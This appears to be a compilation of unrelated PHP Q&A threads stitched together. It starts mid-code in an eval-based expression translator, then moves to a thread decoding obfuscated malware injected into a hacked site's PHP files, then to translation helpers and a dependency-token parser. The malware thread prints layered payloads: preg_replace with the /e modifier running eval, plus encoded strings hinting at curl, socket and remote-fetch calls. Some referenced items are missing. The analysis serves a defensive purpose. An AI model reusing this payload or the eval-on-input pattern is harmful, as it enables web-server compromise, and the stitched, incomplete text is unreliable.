    foreach ($illegal as $string) {
        if (strpos($pseudocode, $string) !== false) {
            throw new InvalidCallException('Attempted to pass illegal pseudocode function.');
        }
    }
    $paramList = '';
    foreach ($parameterList as $param) {
        // Strip "Math." and prefix each known parameter name with "$"
        $pseudocode = str_replace(['Math.', $param], ['', '$' . $param], $pseudocode);
        $paramList .= ',$' . $param;
    }
    // Build the source of an anonymous function wrapping the translated expression
    return 'function (' . ltrim($paramList, ',') . ') {' . PHP_EOL .
        ' return ' . $pseudocode . ';' . PHP_EOL .
        '}';
}
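One thing that stands out in the list above is that it is a denylist: it has no entry for functions such as file_get_contents or unlink, and quote characters are not rejected, so anything the list forgets gets through. A possible hardening, offered only as a sketch and not as part of the original class, is to invert the check and accept nothing but numbers, operators, the declared parameters and a short list of Math functions. The name isSafePseudocode and the default function list are assumptions made for this illustration:

```php
<?php
/**
 * Hypothetical allowlist check: returns true only if $code consists solely of
 * numbers, arithmetic/comparison/ternary operators, parentheses, commas,
 * the given parameter names and Math.<name> calls from $mathFuncs.
 */
function isSafePseudocode(string $code, array $params, array $mathFuncs = ['pow', 'log', 'sqrt', 'abs', 'min', 'max']): bool
{
    // One token: Math.<name>, a bare identifier, a number, or a single operator character.
    $token = '/\G\s*(?:Math\.([a-z0-9]+)|([A-Za-z_]\w*)|(\d+(?:\.\d+)?)|([-+*\/%()?:<>=!&|,]))/';
    $code = trim($code);
    $offset = 0;
    $length = strlen($code);
    while ($offset < $length) {
        if (!preg_match($token, $code, $m, 0, $offset)) {
            return false; // unknown character such as $, ;, a quote or a backtick
        }
        $offset += strlen($m[0]);
        $mathName = $m[1] ?? '';
        $identifier = $m[2] ?? '';
        if ($mathName !== '' && !in_array($mathName, $mathFuncs, true)) {
            return false; // Math function that is not on the allowlist
        }
        if ($identifier !== '') {
            if (!in_array($identifier, $params, true)) {
                return false; // bare identifier that is not a declared parameter
            }
            // A parameter followed by "(" would translate to a dynamic call like $amount(...)
            if (preg_match('/\G\s*\(/', $code, $unused, 0, $offset)) {
                return false;
            }
        }
    }
    return true;
}

var_dump(isSafePseudocode('amount * 1.05', ['amount']));     // bool(true)
var_dump(isSafePseudocode('amount; phpinfo()', ['amount'])); // bool(false)
```

A check like this would run before generatePhpCode(); it narrows what reaches eval but does not make eval itself safe, so a real expression parser remains the more robust option.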

Hacked site - encrypted code

A couple of days ago I noticed that almost all PHP files on my server are infected with some encrypted code, and it is different in almost every file. Here is an example from one of the files:
Can anybody tell me what this code does or how to decode it?
You can calculate the values of some of the variables, and begin to get your bearings.
$vmksmhmfuh = 'preg_replace'; //substr($qbrqftrrvx, (44195 - 34082), (45 - 33));
preg_replace('/(.*)/e', $viwdamxcpm, null); // Calls the function wgcdoznijh() $vmksmhmfuh($ywsictklpo, $viwdamxcpm, NULL);
So the initial purpose is to call the wgcdoznijh() function with the payloads in the script. This is done by way of a function call embedded in the preg_replace replacement string, which the /e modifier in the expression causes to be evaluated as PHP code.
/* aviewwjaxj */ eval(str_replace(chr((257-220)), chr((483-391)), wgcdoznijh($tbjmmtszkv,$qbrqftrrvx))); /* ptnsmypopp */
If you hex decode the result of that you will be just about here:
if ((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) {
$GLOBALS["anuna"] = 1;
function fjfgg($n)
{
    return chr(ord($n) - 1);
}
preg_replace("/(.*)/e", "eval(implode(array_map("fjfgg",str_split("\x25u:f!>!(\x25\x78:!> ...
The above is truncated, but you have another payload as the replacement argument of the new preg_replace call. Again, because of the e modifier it will be executed, and it uses fjfgg as the array_map callback to further decode the payload, which is then passed to eval.
The payload for eval looks like this (hex decoded):
$t9e = '$w9 ="/(.*)/e";$v9 = #5656}5;Bv5;oc$v5Y5;-4_g#&oc$5;oc$v5Y5;-3_g#&oc$5;oc$v5Y5;-2_g#&oc$5;oc$v5Y5;-1_g#&oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J(esolcW#5}5;t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW#5{6))086,1pi$6,J(tcennocW#!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW#&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi#(pi2gnol#&2pi$5;)X$(emanybXteg#&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap#6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi#&%5;-elif#&cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5;-Z#&%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle };))8-,i$,ataDzg$(rtsbus(etalfnizg# nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe#=1a$ ;)po$,)-$(dtg#(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . 
"/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45#9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *# = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;)W#Y#RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|#:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W#; $syv= "eval(str_replace(array"; $siv = "str_replace";$slv = "strrev";$s1v="create_function"; $svv = #//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46x.x?x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x$1\d6x\"=m$;"261'x1x.1x\"=r$;"351xa\07x\"=p$;"651.x%1x&1x\"=l$9{9)q$9,s$(2ne9noitcnuf;}#; $n9 = #1067|416|779|223|361#; $ll = "preg_replace"; $ee1 = array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = str_replace($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#); #,#for($i=0;$i
Which looks truncated ...
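The two decoding layers described above can be reproduced without executing any of the payload. A minimal sketch: stripcslashes() turns the \xNN and octal escapes into plain characters, and shiftBack (a hypothetical name for a string-wide version of fjfgg) undoes the one-character shift. The first sample string is written out here for illustration; the second is the start of the truncated preg_replace argument shown earlier:

```php
<?php
// Layer 1: decode C-style hex (\xNN) and octal (\NNN) escapes without running anything.
$escaped = '\x6f\142\x5f\163\x74\141\x72\164';
echo stripcslashes($escaped), PHP_EOL; // ob_start

// Layer 2: shift every character down by one, as fjfgg() does per character.
function shiftBack(string $s): string
{
    return implode('', array_map(function ($c) {
        return chr(ord($c) - 1);
    }, str_split($s)));
}

echo shiftBack("\x25u:f!>!("), PHP_EOL; // $t9e = '
```

Printing the decoded text with echo instead of passing it to eval keeps each layer inert while you read it.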
That is as far as I have time for, but if you want to continue you may find the following URL useful.
Good luck
I found the same code in a WordPress instance and wrote a short script to remove it from all files:
$directory = new RecursiveDirectoryIterator(dirname(__FILE__));
$iterator = new RecursiveIteratorIterator($directory);
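foreach ($iterator as $filename => $cur)
{
    // skip directories (including the "." and ".." entries)
    if (!$cur->isFile()) {
        continue;
    }
    $contents = file_get_contents($filename);
    // the injected block is expected to end with "?>" at byte offset 13278
    if (strpos($contents, 'tngmufxact') !== false && strlen($contents) > 13200 && strpos($contents, '?>', 13200) == 13278) {
        echo $filename.PHP_EOL;
        file_put_contents($filename, substr($contents, 13280));
    }
}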
Just change the string 'tngmufxact' to your obfuscated version and everything will be removed automatically.
Maybe the length of the obfuscated string will differ - don't test this in your live environment!
Be sure to backup your files before executing this!
I've decoded this script and it is (except the obfuscation) exactly the same as this one: Magento Website Hacked - encryption code in all php files
The URLs inside are the same too:
If you are unsure/inexperienced don't try to execute or decode the code yourself, but get professional help.
Besides that: the decoding was done manually by picking the code pieces and partially executing them (inside a virtual machine - just in case something bad happens).
So basically I've repeated this over and over:
echo the hex strings to get the plain text (to find out which functions get used)
always replace eval with echo
always replace preg_replace("/(.*)/e", ...) with echo(preg_replace("/(.*)/", ...))
The e at the end of the regular expression means evaluate (like the php function eval), so don't forget to remove that too.
In the end you have a few function definitions and one of them gets invoked via ob_start.

How to translate strings in PHP depending on gender and count?

I am working on multilingual application with a centralized language system. It's based on language files for each language and a simple helper function:
$lang['access_denied'] = "Access denied.";
$lang['action-required'] = "You need to choose an action.";
return $lang;
function __($line) {
    return $lang[$line];
}
Up until now, all strings were system messages addressed to the current user, hence I could always do it that way. Now I need to create other messages, where the string should depend on a dynamic value. E.g. in a template file I want to echo the number of action points. If the user only has 1 point, it should echo "You have 1 point."; but for zero or more than 1 point it should be "You have 12 points."
For substitution purposes (both strings and numbers) I created a new function
function __s($line, $subs = array()) {
    $text = $lang[$line];
    while (count($subs) > 0) {
        $text = preg_replace('/%s/', array_shift($subs), $text, 1);
    }
    return $text;
}
Call to function looks like __s('current_points', array($points)).
$lang['current_points'] in this case would be "You have %s point(s).", which works well.
Taking it a step further, I want to get rid of the "(s)" part. So I created yet another function
function __c($line, $subs = array()) {
    $text = $lang[$line];
    // pick the singular form when the first substitute equals 1, the plural form otherwise
    $text = (isset($subs[0]) && $subs[0] == 1) ? $text[0] : $text[1];
    while (count($subs) > 0) {
        $text = preg_replace('/%d/', array_shift($subs), $text, 1);
    }
    return $text;
}
The call now looks like __c('current_points', array($points)).
$lang['current_points'] is now array("You have %d point.","You have %d points.").
How would I now combine these two functions? E.g. if I want to print the username along with the points (like in a ranking), the function call would be something like __x('current_points', array($username,$points)) with $lang['current_points'] being array("%s has %d point.","%s has %d points.").
I tried to employ preg_replace_callback() but I am having trouble passing the substitute values to that callback function.
$text = preg_replace_callback('/%([sd])/',
'switch($type) {
case "s": return array_shift($subs); break;
case "d": return array_shift($subs); break;
Apparently, $subs is not defined as I am getting "out of memory" errors as if the function is not leaving the while loop.
Could anyone point me in the right direction? There's probably a completely different (and better) way to approach this problem. Also, I still want to expand it like this:
$lang['invite_party'] = "%u invited you to %g party."; should become "Adam invited you to his party." for males and "Betty invited you to her party." for females. The passed $subs value for both %u and %g would be a user object.
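One possible way to get the substitute values into the callback is a closure that imports $subs by reference with "use". The following is only a minimal sketch, assuming PHP 5.3 or later; the __x() name comes from the question, while passing $lang as an explicit parameter and letting the first %d value choose between singular and plural are assumptions made to keep the example self-contained.

```php
<?php
// Hypothetical language table: each entry holds a singular and a plural form.
$lang = array(
    'current_points' => array('%s has %d point.', '%s has %d points.'),
);

// Hypothetical combination of __s() and __c().
function __x(array $lang, $line, array $subs = array())
{
    $forms = $lang[$line];

    // Locate the value that belongs to the first %d placeholder.
    preg_match_all('/%([sd])/', $forms[0], $m);
    $countIndex = array_search('d', $m[1]);
    $count = ($countIndex !== false && isset($subs[$countIndex]))
        ? (int) $subs[$countIndex]
        : 1;

    // English rule only: exactly 1 is singular, anything else is plural.
    $text = ($count === 1) ? $forms[0] : $forms[1];

    // The closure imports $subs by reference, so each match consumes one value.
    return preg_replace_callback('/%([sd])/', function ($match) use (&$subs) {
        $value = array_shift($subs);
        return ($match[1] === 'd') ? (string) (int) $value : (string) $value;
    }, $text);
}

echo __x($lang, 'current_points', array('Adam', 1)), "\n";
echo __x($lang, 'current_points', array('Betty', 12)), "\n";
```

Because $subs is imported by reference, array_shift() inside the closure works on the same array across all matches, which is what the string-based callback could not do.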
As mentioned in the comments, gettext() is an alternative.
However, if you need a different approach, here is a workaround:
class ll
{
    private $lang = array(),
            $langFuncs = array(),
            $langFlags = array();

    function __construct()
    {
        $this->lang['access'] = 'Access denied';
        $this->lang['points'] = 'You have %s point{{s|}}';
        $this->lang['party'] = 'A %s invited you to {{his|her}} parteh !';
        $this->lang['toto'] = 'This glass seems %s, {{no one drank in already|someone came here !}}';
        $this->langFuncs['count'] = function($in) { return ($in>1)?true:false; };
        $this->langFuncs['gender'] = function($in) { return (strtolower($in)=='male')?true:false; };
        $this->langFuncs['emptfull'] = function($in) { return ($in=='empty')?true:false; };
        $this->langFlags['points'] = 'count';
        $this->langFlags['toto'] = 'emptfull';
        $this->langFlags['party'] = 'gender';
    }

    public function __($type,$param=null)
    {
        if (isset($this->langFlags[$type])) {
            $f = $this->lang[$type];
            // extract the "ifTrue|ifFalse" alternatives from the {{...}} marker
            preg_match("/{{(.*?)}}/",$f,$m);
            list ($ifTrue,$ifFalse) = explode("|",$m[1]);
            if($this->langFuncs[$this->langFlags[$type]]($param)) {
                return $this->__s(preg_replace("/{{(.*?)}}/",$ifTrue,$this->lang[$type]),$param);
            } else {
                return $this->__s(preg_replace("/{{(.*?)}}/",$ifFalse,$this->lang[$type]),$param);
            }
        } else {
            return $this->__s($this->lang[$type],$param);
        }
    }

    private function __s($s,$i=null)
    {
        return str_replace("%s",$i,$s);
    }
}
$ll = new ll();
echo "Call : access - NULL\n";
echo $ll->__('access'),"\n\n";
echo "Call : points - 1\n";
echo $ll->__('points',1),"\n\n";
echo "Call : points - 175\n";
echo $ll->__('points',175),"\n\n";
echo "Call : party - Male\n";
echo $ll->__('party','Male'),"\n\n";
echo "Call : party - Female\n";
echo $ll->__('party','Female'),"\n\n";
echo "Call : toto - empty\n";
echo $ll->__('toto','empty'),"\n\n";
echo "Call : toto - full\n";
echo $ll->__('toto','full');
This outputs
Call : access - NULL
Access denied
Call : points - 1
You have 1 point
Call : points - 175
You have 175 points
Call : party - Male
A Male invited you to his parteh !
Call : party - Female
A Female invited you to her parteh !
Call : toto - empty
This glass seems empty, no one drank in already
Call : toto - full
This glass seems full, someone came here !
This may give you an idea on how you could centralize your language possibilities, creating your own functions to resolve one or another text.
Hope this helps you.
I've done stuff like this a while ago, but avoided all the pitfalls you are running into by separating concerns.
On the lower level, I had a formatter injected in my template that took care of everything language-specific. Formatting numbers for example, or dates. It had a function "plural" with three parameters: $value, $singular, $plural, and based on the value returned one of the latter two. It did not echo the value itself, because that was left for the number formatting.
The whole translation was done inside the template engine. It was Dwoo, which can do template inheritance, so I set up a master template with all HTML structure inside, and plenty of placeholders. Each language was inheriting this HTML master and replaced all placeholders with the right language output. But because we are still in template engine land, it was possible to "translate" the usage of the formatter functions. Dwoo would compile the template inheritance on the first call, including all subsequent calls to the formatter, including all translated parameters.
The gender problem would get basically the same solution: gender($sex, $male, $female), with $sex being the gender of the subject, and the other params being the male or female wording.
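As a rough illustration of the two formatter helpers described above, here is a minimal sketch. The function names and parameter order follow the description; the bodies are assumptions (English plural rule only, and any value other than "male" is treated as female), not the original formatter's code.

```php
<?php
// Hypothetical formatter helper: returns the wording only, never the number itself.
function plural($value, $singular, $plural)
{
    // English rule only: exactly 1 is singular, everything else (including 0) is plural.
    return ((int) $value === 1) ? $singular : $plural;
}

// Hypothetical formatter helper: picks the male or female wording.
function gender($sex, $male, $female)
{
    return (strtolower($sex) === 'male') ? $male : $female;
}

$points = 12;
echo 'You have ', $points, ' ', plural($points, 'point', 'points'), ".\n";
echo 'Adam invited you to ', gender('male', 'his', 'her'), " party.\n";
```

Keeping the number out of plural() leaves number formatting (thousands separators and the like) to a separate function, which is the separation of concerns this answer describes.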
Perhaps a better approach is the one used by the t() function in Drupal; take a look at it.

PHP Constant string parameters token

In a system we will be using, there is a function called "uses". If you are familiar with Pascal, the uses clause is where you tell your program what dependencies it has (similar to C and PHP includes).
This function is being used in order to further control file inclusion other than include(_once) or require(_once).
As part of testing procedures, I need to write a dependency visualization tool for statically loaded files.
Statically Loaded Example: uses('core/core.php','core/security.php');
Dynamically Loaded Example: uses('exts/database.'.$driver.'.php');
I need to filter out dynamic load cases because the code is tested statically, not while running.
This is the code I'm using at this time:
$inuses=false; // whether currently in uses function or not
$uses=array(); // holds dependencies (line=>file)
$tknbuf=array(); // last token
foreach(token_get_all(file_get_contents($file)) as $token){
    // detect uses function
    if(!$inuses && is_array($token) && $token[0]==T_STRING && $token[1]=='uses')$inuses=true;
    // detect uses argument (dependency file)
    if($inuses && is_array($token) && $token[0]==T_CONSTANT_ENCAPSED_STRING)$tknbuf=$token;
    // detect the end of uses function
    if($inuses && is_string($token) && $token==')'){
        isset($uses[$tknbuf[2]])
            ? $uses[$tknbuf[2]][]=$tknbuf[1]
            : $uses[$tknbuf[2]]=array($tknbuf[1]);
    }
    // a new argument (dependency) is found
    if($inuses && is_string($token) && $token==',')
        isset($uses[$tknbuf[2]])
            ? $uses[$tknbuf[2]][]=$tknbuf[1]
            : $uses[$tknbuf[2]]=array($tknbuf[1]);
}
Note: It may help to know that I'm using a state engine to detect the arguments.
My issue? Since there are all sorts of arguments that can go in the function, it is very difficult getting it right.
Maybe I'm not using the right approach, however, I'm pretty sure using token_get_all is the best in this case. So maybe the issue is my state engine which really isn't that good.
I might be missing the easy way out, thought I'd get some peer review off it.
Edit: I took the approach of explaining what I'm doing this time, but not exactly what I want.
Put in simple words, I need to get an array of the arguments being passed to a function named "uses". The thing is I'm a bit specific about the arguments; I only need an array of straight strings, no dynamic code at all (constants, variables, function calls...).
Using regular expressions:
file_get_contents('uses.php'), $matches, PREG_SET_ORDER);
foreach ($matches as $set) {
    list($full, $match) = $set;
    echo "$full\n";
    // try to remove function arguments
    $new = $match;
    do {
        $match = $new;
        $new = preg_replace('/\([^()]*\)/', '', $match);
    } while ($new != $match);
    // iterate over each of the uses() args
    foreach (explode(',', $match) as $arg) {
        $arg = trim($arg);
        if (($arg[0] == "'" || $arg[0] == '"') && substr($arg,-1) == $arg[0])
            echo " ".substr($arg,1,-1)."\n";
    }
}
Running against:
uses('bar.php', 'test.php', $foo->bar());
uses(bar('test.php'), 'file.php');
uses(bar(foo('a','b','c')), zed());
uses('bar.php', 'test.php', $foo->bar())
uses(bar('test.php'), 'file.php')
uses(bar(foo('a','b','c')), zed())
Obviously it has limitations and assumptions, but if you know how the code is called, it could be sufficient.
OK I got it working. Just some minor fixes to the state engine. In short, argument tokens are buffered instead of put in the uses array directly. Next, at each ',' or ')' I check if the token is valid or not and add it to the uses array.
$inuses=false; // whether currently in uses function or not
$uses=array(); // holds dependencies (line=>file)
$tknbuf=array(); // last token
$tknbad=false; // whether last token is good or not
foreach(token_get_all(file_get_contents($file)) as $token){
    // detect uses function
    if(!$inuses && is_array($token) && $token[0]==T_STRING && $token[1]=='uses')$inuses=true;
    // token found, put it in buffer
    if($inuses && is_array($token) && $token[0]==T_CONSTANT_ENCAPSED_STRING)$tknbuf=$token;
    // end-of-function found, check buffer and throw into $uses
    if($inuses && is_string($token) && $token==')'){
        if(count($tknbuf)==3 && !$tknbad)isset($GLOBALS['uses'][$file][$tknbuf[2]])
            ? $GLOBALS['uses'][$file][$tknbuf[2]][]=$tknbuf[1]
            : $GLOBALS['uses'][$file][$tknbuf[2]]=array($tknbuf[1]);
        $tknbuf=array(); $tknbad=false;
    }
    // end-of-argument, check token and add to $uses
    if($inuses && is_string($token) && $token==','){
        if(count($tknbuf)==3 && !$tknbad)isset($GLOBALS['uses'][$file][$tknbuf[2]])
            ? $GLOBALS['uses'][$file][$tknbuf[2]][]=$tknbuf[1]
            : $GLOBALS['uses'][$file][$tknbuf[2]]=array($tknbuf[1]);
        $tknbuf=array(); $tknbad=false;
    }
    // if current token is not a simple string, flag all tokens as bad
    if($inuses && is_array($token) && $token[0]!=T_CONSTANT_ENCAPSED_STRING)$tknbad=true;
}
Edit: Actually it is still faulty (a different issue though). But the new idea I've had ought to work out nicely.
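One way such a state engine could be made more robust is to track bracket depth and collect every significant token of an argument, keeping the argument only if it turns out to be exactly one quoted string literal. The following is a minimal sketch of that idea, not the approach the author ended up with: extractUses() is a hypothetical name, it takes source code instead of a file path, and it does not tell a plain uses() call apart from a method or function declaration with the same name.

```php
<?php
// Collect literal string arguments of uses(...) calls, grouped by line number.
function extractUses($code)
{
    $uses = array();
    $depth = 0;        // bracket depth inside the current uses() call, 0 = outside
    $pending = false;  // true right after the "uses" identifier, before its "("
    $arg = array();    // significant tokens of the argument being read

    foreach (token_get_all($code) as $token) {
        $id = is_array($token) ? $token[0] : null;
        if ($id === T_WHITESPACE || $id === T_COMMENT || $id === T_DOC_COMMENT) {
            continue; // layout and comments never make an argument dynamic
        }

        if ($depth === 0) {
            if ($pending && $token === '(') {
                $depth = 1;
                $arg = array();
            }
            $pending = ($id === T_STRING && strtolower($token[1]) === 'uses');
            continue;
        }

        $text = is_array($token) ? $token[1] : $token;
        $closing = ($text === ')' || $text === ']');

        // A top-level "," or the final ")" ends the current argument.
        if ($depth === 1 && ($text === ',' || $closing)) {
            if (count($arg) === 1 && $arg[0][0] === T_CONSTANT_ENCAPSED_STRING) {
                // Strip the surrounding quotes; escape sequences are left as written.
                $uses[$arg[0][2]][] = substr($arg[0][1], 1, -1);
            }
            $arg = array();
            if ($closing) {
                $depth = 0;
            }
            continue;
        }

        if ($text === '(' || $text === '[') {
            $depth++;
        } elseif ($closing) {
            $depth--;
        }
        // Single-character tokens get a placeholder id so they still count.
        $arg[] = is_array($token) ? $token : array(null, $token, 0);
    }
    return $uses;
}

$code = <<<'PHP'
<?php
uses('core/core.php', 'core/security.php');
uses('exts/database.' . $driver . '.php');
uses(bar('test.php'), 'file.php');
PHP;
print_r(extractUses($code));
```

Concatenations, variables, constants and nested calls all produce more than one token (or a token that is not a quoted string) for their argument, so they are dropped without needing a separate "bad token" flag.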
